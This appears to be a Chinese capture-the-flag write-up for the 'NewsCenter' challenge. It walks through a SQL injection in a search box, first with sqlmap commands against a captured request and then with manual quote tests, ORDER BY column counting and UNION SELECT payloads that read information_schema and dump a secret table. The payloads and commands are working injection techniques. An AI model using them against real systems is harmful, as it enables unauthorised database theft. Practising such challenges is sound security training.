2025.1.16——一、NewsCenter

题目来源:攻防世界 NewsCenter

目录

一、题目

二、sqlmap解题------bp抓包存为txt文件进行爆破

[step 1:search框内随便输入,进行抓包](#step 1:search框内随便输入,进行抓包)

[step 2:抓包后,存到txt文件,进行sqlmap](#step 2:抓包后,存到txt文件,进行sqlmap)

[step 3:-r获取文件,--dump获取flag](#step 3:-r获取文件,--dump获取flag)

三、手工注入解题

[step 1:判断 GET 还是 POST 传参](#step 1:判断 GET 还是 POST 传参)

[step 2:判断注入点类型](#step 2:判断注入点类型)

[step 3:判断字段数 ' 和 # 不可缺少](# 不可缺少)

[step 4:爆表名](#step 4:爆表名)

[step 5:爆列名](#step 5:爆列名)

[step 6:爆具体数据](#step 6:爆具体数据)


本题由于靶机出问题,所以看了很多博主的wp

一、题目

可以看到有注入点,首选sqlmap,其次为手工注入

二、sqlmap解题------bp抓包存为txt文件进行爆破

step 1:search框内随便输入,进行抓包

step 2:抓包后,存到txt文件,进行sqlmap

step 3:-r获取文件,--dump获取flag

方法一:

连接口令:python sqlmap.py -r 文件路径

爆破口令:python sqlmap.py -r 文件路径 --dump

方法二:

①python sqlmap.py -r 文件名 -dbs

②python sqlmap.py -r 文件名 -D 数据库名 --tables

③python sqlmap.py -r 文件名 -D 数据库名 -T 表名 --columns

④python sqlmap.py -r 文件名 -D 数据库名 -T 表名 -C 列名 --dump

可得到flag信息

三、手工注入解题

重点:①需要判断 GET 还是 POST 传参;②判断注入点类型;③尝试万能密码;④尝试联合注入

step 1:判断 GET 还是 POST 传参

搜索新闻初步判定为POST请求,可考虑xss或sql注入

尝试xss注入,而页面没有返回值,且根据源码得js代码没有被过滤,所以无xss漏洞。所以此处为sql注入

step 2:判断注入点类型

键入:1、1''、1' and '1'=1'

均回显正常

键入:1'

出现错误

所以这里是字符注入

step 3:判断字段数 ' 和 # 不可缺少

键入:1' order by 3 #

回显正常

键入:1' order by 4 #

回显错误

故字段数为3

step 4:爆表名

sql 复制代码
1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() #

发现有两张表:news、secret_table

step 5:爆列名

第一张表:

sql 复制代码
1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='secret_table'#

有两列:id、fl4g

第二张表:

sql 复制代码
1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='news'#

有三列:id、title、content

step 6:爆具体数据

flag应该在secret_table表的fl4g列中

sql 复制代码
1' union select 1,2,fl4g from secret_table #

可得到flag信息

相关推荐
踏月的造梦星球2 小时前
DMDPC 学习:架构、部署、运维与调优
运维·数据库·学习·架构
韩楚风3 小时前
【参天引擎】事务生命周期 / MVCC / Undo / ACID / 分布式事务 功能域整体解析
数据库·分布式·mysql·架构·cantian
renhongxia13 小时前
世界模型,是“空中楼阁”还是AGI的“最后一块拼图”?
运维·服务器·数据库·人工智能·算法·agi
程序员无隅3 小时前
Coding Agent 为什么压缩上下文后还能继续工作?上下文模块设计拆解
java·开发语言·数据库
愿做无知一猿4 小时前
Nacos连接MySQL异常?DataGrip竟成救星
数据库·mysql
G.O.G.O.G4 小时前
LeetCode SQL 从入门到精通(MySQL)06(上)
数据库·sql·mysql·leetcode
研究员子楚4 小时前
GEO行业发展标准体系白皮书V2.0-第10卷 · 全球篇:跨国标准协同与全球品牌语义治理框架
数据库·人工智能·microsoft·架构·geo
GHL2842710905 小时前
unreferenced formal parameter 解决办法学习
学习
Omics Pro5 小时前
深度学习多组学互作:组内+组间
数据库·人工智能·深度学习·mysql·搜索引擎·自然语言处理
2501_915106326 小时前
TraceEagle 代理抓包教程 本机和手机的 HTTPS 抓包方法
网络协议·计算机网络·网络安全·ios·adb·https·udp